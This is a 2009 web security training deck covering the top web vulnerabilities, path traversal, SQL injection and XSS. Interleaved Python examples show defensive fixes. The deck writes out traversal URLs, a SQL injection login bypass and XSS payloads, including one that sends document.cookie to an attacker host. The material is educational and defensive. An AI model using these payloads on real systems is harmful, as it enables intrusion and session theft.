Web Security Overview
Lohika ASC team, 2009, [email protected]
Agenda
• The Evolution of Web Applications
• Common Web Application Functions
• Server/Browser Information Flow and Vulnerabilities
• The Security Aspects
• Web Security Assessment Main Stages
• Web Application Vulnerabilities - Top 10
• Path Manipulation Attack
• Parameter Manipulation Attack
• ASC Products Overview
The Evolution of Web Applications

Early days of the Internet:
• Web sites were static documents
• One-way information flow: Server -> Browser
• No authentication/authorization
• Low interest for malicious intruders: no sensitive information stored, everything in public view
• Typically attackers modified the files to deface the site
• Attackers used the server's storage and bandwidth to distribute "warez"

Current days:
• The majority of sites are web applications
• Web applications rely on two-way information flow: Server <-> Browser
• Web applications are diverse and complicated:
  • Different technologies
  • Registration
  • Login
  • Financial transactions
  • Web search
  • Authoring of content by users
  • Content generated on the fly
  • Content tailored to a specific user
=> Security is a big issue!
The Evolution of Web Applications (Continued)

Rapid evolution of web applications:
• No longer a set of static pages
• Rely on multiple technology layers and concepts to provide interactive content
• Replacing desktop applications in many areas
• Are used everywhere
Common Web Application Functions
1. Social Networking
2. Shopping
3. Auctions
4. Web mail
5. Banking
6. Web logs
7. Gambling
8. Web Search
9. Interactive information

All of these are potentially not secure. For example: MySpace and the Samy Worm, http://namb.la/popular/tech.html
Server/Browser Information Flow

[Figure: information flow diagram with the components Browser (External User), Firewall, HTTP Server, Auth Service, Web Service, Database, Browser (Internal User), Internal HTTP Server, all within the Server Infrastructure.]

Two-way information flow: Server <-> Browser
Server/Browser Information Flow and Vulnerabilities

[Figure: the same diagram (Browser of the External User, Firewall, HTTP Server, Auth Service, Web Service, Database, Browser of the Internal User, Internal HTTP Server, Server Infrastructure) annotated with the vulnerabilities that appear along the flow: XML Injection, Path Traversal, SQL Injection, Parameter Tampering, Forged Token, XSS, CSRF, Local File Include, Remote File Inclusion.]

Two-way information flow: Server <-> Browser
The Security Aspect

In recent years, web application security has become a focal point for security experts. Application attacks are constantly on the rise, posing new risks for the organization.

Application security sometimes gets overlooked by Dev, QA or Operations teams for various reasons:
• Risks involved are underestimated / not fully realized
• Lack of competence
• Lack of time

Any business that relies on a vulnerable web application is potentially at risk of a major business impact with serious implications.

This is a problem.
Web Security Assessment Main Stages

Map the Application's Content
1 Linked Content
  1.1 Explore visible content
  1.2 Consult public resources
2 Other Content
  2.1 Discover hidden content
  2.2 Discover default content
3 Non-standard access methods
  3.1 Identifier-specified functions
  3.2 Debug parameters

Analyze the Application
1. Identify functionality
2. Identify data entry points
3. Identify technologies
Attack Vectors

Attack patterns and goals
Web Application Vulnerabilities Top 10

Injection
• Examples of injection flaws are SQL, XML, LDAP, HTTP header injection (cookies, requests), and OS command injection
• Attacks occur when untrusted data, such as a query, command or argument, is sent to an interpreter
• Vulnerable applications can be tricked into executing unintended commands or allowing the attacker to access and modify data

Cross Site Scripting
• There are three types of XSS attacks: stored, reflected, and DOM based
• XSS attacks occur when an application allows data that is not validated or escaped properly to be sent to a web browser
• Malicious scripts are executed in the victim's browser, allowing the attacker to hijack the user's session, steal cookies, deface web sites, redirect users to malicious web sites, and control the browser remotely

Broken Authentication and Session Management
• Users are impersonated due to leaks or flaws in the authentication process
• Attacks occur when a session ID is visible to others, timeouts are not properly set, SSL/TLS is not used, or any other flaw in the authentication scheme is detected
• Flaws used against one account may be replicated against an account with higher privileges

Insecure Direct Object References
• The attack occurs when an authorized user can change a parameter value that refers to a system object they are not authorized for
• Almost any reference that can be reached by URL is affected, including references to files, paths, database keys, and reflection by class name (e.g. JDBC connector class)
• Remote referencing includes Web Services, CORBA, RMI, RPC

Cross Site Request Forgery (CSRF)
• The attacker creates malicious code to generate a forged request that the attacker tricks the victim into submitting
• Forged requests can be hidden in image tags, XSS attacks and a number of other techniques
• CSRF attacks can complete any transaction the victim is permitted to perform, such as accessing data, transferring funds or making purchases

Security Misconfiguration
• The attacker exploits unsecured pages, default accounts, unpatched flaws or any other vulnerability that could have been addressed by proper configuration
• These attacks can result in a complete system compromise

Failure to Restrict URL Access
• This attack takes place when an authorized user can simply change a URL to access a privileged page
• Attackers generally look for administrative functions to employ this attack on
• Links can be obtained from hidden fields, client-side code, robots.txt, configuration files, static XML files, and directory access

Unvalidated Redirects and Forwards
• An unvalidated parameter allows an attacker to choose the destination page to which a victim is sent, in order to trick them into disclosing private information
• Victims trust these links because the link is to a valid site

Insecure Cryptographic Storage
• The most common reason for this attack is that data that should be encrypted is stored in cleartext
• It can result from the poor use of encryption algorithms, such as using home-grown algorithms, insecure use of strong algorithms or the continued use of proven weak algorithms
• The use of weak or unsalted hashes to protect passwords is another common flaw that leads to this risk

Insufficient Transport Layer Protection
• Most commonly, this attack occurs when a site does not use SSL/TLS for pages that require authentication, so an attacker can monitor network traffic to steal an authenticated user's session cookie
• Poorly configured SSL certificates can lull a user into accepting warnings for legitimate sites, only to be tricked into accepting a phishing site's certificate
• Attacks can lead to account theft, phishing attacks and admin accounts being compromised
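The "Insecure Cryptographic Storage" item above names unsalted hashes as a common flaw. The following added example (not code from the deck or from Lohika) contrasts the flaw with a corrected password record: an unsalted MD5 on one side, a per-user random salt with PBKDF2-HMAC-SHA256 and a constant-time comparison on the other. The record format `salt$iterations$hash` and the iteration count are this example's own assumptions.

```python
import hashlib
import hmac
import os

# Assumption: the iteration count is tuned to the server hardware; 100k is a
# reasonable 2009-era starting point, not a value from the deck.
ITERATIONS = 100_000


def weak_hash(password):
    """Unsalted MD5, the flaw the deck describes: every user with the same
    password gets the same digest, so one cracked hash unlocks all of them."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def make_record(password, salt=None):
    """Salted, iterated record in the form 'salt$iterations$hash' (this
    example's own format). A fresh random salt is drawn when none is given."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return "%s$%d$%s" % (salt.hex(), ITERATIONS, digest.hex())


def verify_record(password, record):
    """Recompute the digest with the stored salt and iteration count and compare
    in constant time so response timing does not leak how many bytes matched."""
    salt_hex, iterations, digest_hex = record.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)
```

Two users with the password `qwert` receive identical `weak_hash` values but different `make_record` values, which is what the salt buys: a precomputed table of MD5 digests is useless against the salted records.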
Path Manipulation Attacks and Parameter Manipulation Attacks

Attack Techniques
Among the most dangerous and most common attack techniques are:

Path manipulation:
• Directory Indexing
• Path Traversal
• Predictable resource location
• Path Truncation

Parameter manipulation:
• Abnormal input
• Brute Force Authentication Attack
• SQL Injection
• SOAP Injection
• Command Execution
• Cross Site Scripting (XSS)
Path manipulation: 1. Directory Indexing

Automatic directory listing/indexing is a web server function that lists all of the files within a requested directory.
The following information could be obtained from directory indexing data:
• Backup files
• Temporary files
• Hidden files
• Naming conventions
• Configuration file contents
• Script contents
Note: the listing is produced when the directory's normal base file (index.html, home.html or default.htm) is not present.
Path manipulation: 2. Path Truncation

Path truncation attacks are requests for known directories without filenames. This may cause directory listings to be displayed.

Example:
1. Given the following URL: http://www.site.com/folder1/folder2/file.asp
2. truncating the path to look for http://www.site.com/folder1/folder2/
3. and http://www.site.com/folder1/
may cause the web server to reveal directory contents or to cause unhandled exceptions.
Path manipulation: 3. Path Traversal

These attacks are expressions in the URI that will cause the web server to display the contents of files above the webroot.

Example:
1. Given the following URL: http://www.site.com/folder1/../../../../../../../boot.ini
2. Or the following: http://www.site.com/getnews.php?name=../../../../../../boot.ini

This occurs when the web application uses the string to specify a file location without first completely parsing out the traversal characters.
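The fix the slide calls for is to canonicalise the requested path and then check that it still lies under the web root, rather than trying to strip `../` sequences one by one. The following is an added example (not code from the deck or from Lohika) of such a check; the web root `/var/www/site` is a hypothetical path chosen for the example. It decodes percent-encoding twice so double-encoded traversal is seen, refuses NUL bytes (the `%00` the deck mentions under abnormal input), treats backslashes as separators, and only then joins and normalises.

```python
import posixpath
from urllib.parse import unquote

# Constructed web root for this example (a hypothetical path, not one from the deck).
WEBROOT = "/var/www/site"


def resolve_under_webroot(requested, webroot=WEBROOT):
    """Map a user-supplied path (URL path or a ?name= parameter) to a file
    under webroot. Returns the canonical path, or None when the request must
    be refused: an embedded NUL byte, or a canonical form outside the root."""
    # Decode percent-encoding twice so "%252e%252e%252f" is seen as "../".
    decoded = unquote(unquote(requested))
    # A NUL byte ("%00" on the wire) truncates the name in C-based file APIs,
    # so it is refused outright instead of being stripped.
    if "\x00" in decoded:
        return None
    # Treat backslashes as separators: Windows servers accept "..\" as well.
    decoded = decoded.replace("\\", "/")
    root = posixpath.normpath(webroot)
    # Join first, canonicalise second: "/var/www/site/../../x" collapses to
    # "/var/x" and is then caught by the prefix check below.
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


if __name__ == "__main__":
    for p in ("folder1/folder2/file.asp",
              "/folder1/../../../../../../../boot.ini",
              "../../../../../../boot.ini",
              "news%00.html"):
        print(repr(p), "->", resolve_under_webroot(p))
```

A result equal to the root itself, or to any directory, is the path-truncation case from the previous slide: serve it only when the directory's base file exists, never as an automatic listing.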
Path manipulation: 4. Predictable Resource Location. Directory Enumeration

Directory enumeration lists all directory paths and possibilities on the application server, including hidden directories that could possibly contain sensitive information.
Parameter manipulation: Where can we find the entry points of a web application?
• HTTP GET request with query parameters
• HTTP POST request with parameters
• HTTP Cookies
• Custom HTTP headers
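Enumerating those four channels is the first step of both an assessment and of input validation on the server side. The following added example (not code from the deck or from Lohika) parses a raw HTTP request and returns every parameter grouped by the channel it arrived on. The request text is constructed for the example, and the set of headers treated as "standard" (left to the server framework rather than application code) is this example's own assumption.

```python
from http.cookies import SimpleCookie
from urllib.parse import parse_qsl, urlsplit

# Constructed sample request (not from the deck): a query string, a form body,
# two cookies and one custom header, all of them attacker-controllable input.
SAMPLE_REQUEST = (
    "POST /login.php?name=Vlad&lang=en HTTP/1.1\r\n"
    "Host: www.site.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: PHPSESSID=abc123; theme=dark\r\n"
    "X-Forwarded-For: 10.0.0.7\r\n"
    "Content-Length: 25\r\n"
    "\r\n"
    "password=12345&remember=1"
)

# Assumption: these headers are consumed by the web server itself; everything
# else is a custom header that reaches application code directly.
STANDARD_HEADERS = {"host", "content-type", "content-length", "cookie",
                    "user-agent", "accept"}


def enumerate_entry_points(raw):
    """Return {channel: {name: value}} for the four channels on the slide."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()

    entry = {"query": {}, "body": {}, "cookie": {}, "header": {}}
    # 1. GET-style query parameters are present on any method.
    entry["query"] = dict(parse_qsl(urlsplit(target).query, keep_blank_values=True))
    # 2. POST parameters from a form-encoded body.
    if method == "POST" and headers.get("content-type", "").startswith(
            "application/x-www-form-urlencoded"):
        entry["body"] = dict(parse_qsl(body, keep_blank_values=True))
    # 3. Cookies, each a separate attacker-controlled value.
    jar = SimpleCookie()
    jar.load(headers.get("cookie", ""))
    entry["cookie"] = {name: morsel.value for name, morsel in jar.items()}
    # 4. Custom headers the application reads itself.
    entry["header"] = {k: v for k, v in headers.items() if k not in STANDARD_HEADERS}
    return entry


if __name__ == "__main__":
    for channel, params in enumerate_entry_points(SAMPLE_REQUEST).items():
        print(channel, params)
```

Each value in the returned dictionaries is untrusted: the sessions, validators and encoders in the later slides have to be applied to every one of them, not only to the visible form fields.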
Parameter manipulation: 1. Abnormal Input (parameter overflow)

Abnormal input attack strings are composed of characters that can cause unhandled exceptions.
Unhandled exceptions often cause error messages to be displayed that disclose sensitive information about the application's internal mechanics. Source code may even be disclosed.

Example:
1. Given the following URL: http://www.site.com/cgi-bin/process.pl?id=%00 (where %00 is the poisonous null byte)
2. Or the following: http://www.site.com/cgi-bin/process.pl?id=99999999999999999
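The two probes above succeed only when the parameter reaches application logic unvalidated and the resulting exception is rendered to the client. The following added example (not code from the deck or from Lohika) shows the handler-side counterpart: the `id` parameter is checked against an allow-list pattern and a numeric range before use, and any rejection produces the same fixed response so that nothing about the internals leaks. The range bound and the `handle_process` dispatcher are this example's own assumptions.

```python
import re

# Assumption: ids live in a signed 32-bit column, so anything larger is
# rejected before it can overflow or trigger a database error page.
MAX_ID = 2 ** 31 - 1
# Allow-list: one to ten decimal digits and nothing else (no NUL, no sign,
# no whitespace, no letters).
ID_PATTERN = re.compile(r"[0-9]{1,10}")


class RejectedInput(ValueError):
    """Raised for input that must not reach file or database code."""


def parse_record_id(raw):
    """Validate the ?id= parameter and return it as an int."""
    if raw is None:
        raise RejectedInput("missing id")
    if "\x00" in raw:                       # %00 after URL decoding
        raise RejectedInput("NUL byte in id")
    if not ID_PATTERN.fullmatch(raw):
        raise RejectedInput("id is not a short decimal number")
    value = int(raw)
    if not 1 <= value <= MAX_ID:
        raise RejectedInput("id out of range")
    return value


def handle_process(params):
    """Stand-in for /cgi-bin/process.pl: a generic error for bad input, so the
    client never sees a stack trace, a query, or a source fragment."""
    try:
        record_id = parse_record_id(params.get("id"))
    except RejectedInput as exc:
        # Detail goes to the server log only; the client gets a fixed message.
        server_log("rejected id parameter: %s" % exc)
        return 400, "Bad request"
    return 200, "record %d" % record_id


def server_log(message):
    """Placeholder for the application's own logging (assumed, not the deck's)."""
    pass


if __name__ == "__main__":
    for probe in ("42", "\x00", "99999999999999999", "12abc"):
        print(repr(probe), "->", handle_process({"id": probe}))
```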
Parameter manipulation: 2. Brute Force Authentication Attack

The brute force attack is a method of obtaining a user's authentication credentials.
Using brute force, attackers attempt combinations of the accepted character set in order to find a specific combination that gains access to the authorized area.
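Because the attack is nothing more than repeated login attempts, it is visible in the authentication log as a burst of failures from one source, sometimes followed by a success. The following added example (not code from the deck or from Lohika) runs a sliding-window detector over a constructed log excerpt; the log format, the five-failures-per-minute threshold and the alert tuples are this example's own assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log (not from the deck): one source hammering the login
# form until a guess succeeds, plus a benign user with a single typo.
SAMPLE_LOG = """\
2009-06-01 10:00:01 10.0.0.7 login FAIL user=admin
2009-06-01 10:00:02 10.0.0.7 login FAIL user=admin
2009-06-01 10:00:02 192.168.1.5 login OK user=vlad
2009-06-01 10:00:03 10.0.0.7 login FAIL user=admin
2009-06-01 10:00:04 10.0.0.7 login FAIL user=admin
2009-06-01 10:00:05 10.0.0.7 login FAIL user=admin
2009-06-01 10:00:06 10.0.0.7 login OK user=admin
2009-06-01 10:09:00 192.168.1.5 login FAIL user=vlad
"""


def parse_line(line):
    """'<date> <time> <source> login <OK|FAIL> user=<name>' -> (ts, src, ok, user)."""
    date, time, src, _action, result, user = line.split()
    ts = datetime.strptime(date + " " + time, "%Y-%m-%d %H:%M:%S")
    return ts, src, result == "OK", user.split("=", 1)[1]


def detect_bruteforce(log_text, threshold=5, window=timedelta(minutes=1)):
    """Alert when a source accumulates `threshold` failures inside `window`,
    and again when a success follows such a burst (a guess that worked)."""
    failures = defaultdict(deque)   # source -> timestamps of recent failures
    alerts = []
    for line in log_text.splitlines():
        ts, src, ok, user = parse_line(line)
        recent = failures[src]
        while recent and ts - recent[0] > window:   # drop events outside the window
            recent.popleft()
        if ok:
            if len(recent) >= threshold:
                alerts.append((src, user, "success after %d failures" % len(recent)))
            recent.clear()
        else:
            recent.append(ts)
            if len(recent) == threshold:             # fire once per burst
                alerts.append((src, user, "%d failures in %s" % (threshold, window)))
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

The same counter, kept per account as well as per source, is what drives the usual mitigations: progressive delays, temporary lockout and CAPTCHA after the threshold is crossed.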
Parameter manipulation: 3. SQL Injection

Simple injection with the 'OR true' construction.

Incorrectly filtered escape characters: this form of SQL injection occurs when user input is not filtered for escape characters and is then passed into a SQL statement. This results in the potential manipulation of the statements performed on the database by the end user of the application.

Example: the normal login query
SQL query: SELECT `id`,`login`,`pass` FROM `users` WHERE login='admin' AND pass='qwert';

Identify the availability of SQL injection:
?login=aaa'  (get error: You have an error in your SQL syntax...)
?login=aaa' OR 1=1 OR 'bbb  (use "or 1=1" signatures)
SQL query: SELECT `id`,`login`,`pass` FROM `users` WHERE login='aaa' OR 1=1 OR 'bbb' AND pass='qwert';

Example:
1. Given the following URL: http://www.site.com/login.php?name=Vlad&password=12345
2. After login the "Welcome Vlad to our site" message appears on the site page
3. What happens if the user name is the following: http://www.site.com/login.php?name=anyuser' OR 1=1 --&password=unknown
4. Of course, the SQL query becomes: SELECT `id`,`login`,`pass` FROM `users` WHERE login='anyuser' OR 1=1 --' AND pass='unknown';
5. You are logged in as anyuser!!!
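The root cause in step 4 is that the user name is pasted into the statement text, so a quote in the input ends the string literal and the rest is parsed as SQL. The following added example (not code from the deck or from Lohika) reproduces the deck's login query against an in-memory SQLite table with constructed rows, once by string concatenation and once with bound parameters, so the difference can be observed directly. The `syntax_error_on_quote` helper mirrors the deck's first probe (`?login=aaa'`), which is exactly the symptom a reviewer looks for when auditing a login handler.

```python
import sqlite3


def make_db():
    """In-memory users table with constructed sample rows (not the deck's data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, pass TEXT)")
    conn.executemany("INSERT INTO users (login, pass) VALUES (?, ?)",
                     [("admin", "s3cret"), ("Vlad", "12345")])
    return conn


def login_vulnerable(conn, name, password):
    """Builds the statement by concatenation, as the deck's login.php does.
    Returns the logins of all rows the WHERE clause matched."""
    sql = ("SELECT id, login, pass FROM users WHERE login='" + name
           + "' AND pass='" + password + "' ORDER BY id;")
    return [row[1] for row in conn.execute(sql).fetchall()]


def login_safe(conn, name, password):
    """Same query with bound parameters: the driver sends the values separately
    from the statement text, so input can never change the SQL structure."""
    sql = "SELECT id, login, pass FROM users WHERE login=? AND pass=? ORDER BY id"
    return [row[1] for row in conn.execute(sql, (name, password)).fetchall()]


def syntax_error_on_quote(conn, name, password="qwert"):
    """True when the concatenated query breaks on the input: the deck's first
    probe, and the signal an audit looks for in the server's error log."""
    try:
        login_vulnerable(conn, name, password)
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    payload = "anyuser' OR 1=1 --"
    print("concatenated:", login_vulnerable(db, payload, "unknown"))
    print("parameterised:", login_safe(db, payload, "unknown"))
```

Note that the vulnerable version does not merely log in `anyuser`: the `OR 1=1` matches every row, so whichever row the application reads first becomes the session's identity, which is why the same input is used to reach `admin`.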
Parameter manipulation: 5. Cross Site Scripting

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users.

[Figure: code injection into the client side (web browser). A popular Web Portal (forum, gallery, livejournal, etc.) delivers the injected content to several Users, each of whom is a victim.]
Simple XSS Attack

Example:
http://myserver.com/test.jsp?name=Stefan
<HTML>
<Body> Welcome Stefan </Body>
</HTML>

http://myserver.com/welcome.jsp?name=<script>alert("Attacked")</script>
<HTML>
<Body>
Welcome <script>alert("Attacked")</script>
</Body>
</HTML>
Example:
6. Try to log in under the following user name: http://www.site.com/login.php?name=<script>alert(111);</script>' OR '1=1#&password=…
7. After login the "Welcome <script>alert(111);</script>' OR '1=1# to our site" message appears in the HTML source of the page. As a result, the popup message box with "111" appears: it is XSS!!!
8. What happens if the user name is the following: <script>alert(document.cookie);</script>' OR ='1
9. And what happens if the user name is the following: <script> document.writeln("<img src=http://myhackersite.com/?a=" + document.cookie + ">"); </script>' OR 1=1#
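In every variant above the page copies the `name` parameter into the HTML body verbatim, so the browser parses the attacker's markup as part of the page. The following added example (not code from the deck or from Lohika) renders the deck's welcome page both ways: unchanged, as `welcome.jsp` does, and with the parameter HTML-encoded for an element-body context, which is the fix. The `body_has_raw_tags` check is a verification helper for this example only, not a general XSS detector.

```python
import html
from urllib.parse import parse_qs, urlsplit


def name_from_url(url):
    """Extract the ?name= parameter as the server would see it."""
    return parse_qs(urlsplit(url).query).get("name", [""])[0]


def render_vulnerable(name):
    """welcome.jsp as shown in the deck: the parameter lands in the page untouched."""
    return "<HTML>\n<Body>\nWelcome " + name + "\n</Body>\n</HTML>"


def render_escaped(name):
    """Same page with the parameter encoded for an element body: '<', '>', '&'
    and both quote characters become entities, so the browser shows the text
    of the payload instead of executing it."""
    return "<HTML>\n<Body>\nWelcome " + html.escape(name, quote=True) + "\n</Body>\n</HTML>"


def body_has_raw_tags(page):
    """Verification helper for this example: the welcome body is plain text,
    so any '<' between the Body tags means markup got through."""
    body = page.split("<Body>", 1)[1].split("</Body>", 1)[0]
    return "<" in body


if __name__ == "__main__":
    payload = name_from_url('http://myserver.com/welcome.jsp?name=<script>alert("Attacked")</script>')
    print(render_vulnerable(payload))
    print(render_escaped(payload))
```

Encoding at output time is the control the deck's examples are missing; the cookie theft in steps 8 and 9 is additionally blunted by marking the session cookie `HttpOnly`, which keeps it out of `document.cookie` even when a script does run.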
ASC Products Overview

Application Security Center Product Overview:
• WebInspect
• QAInspect
• Assessment Management Platform (AMP)

Security Center Product Overview, Entire Suite: SecurityInspect

Q & A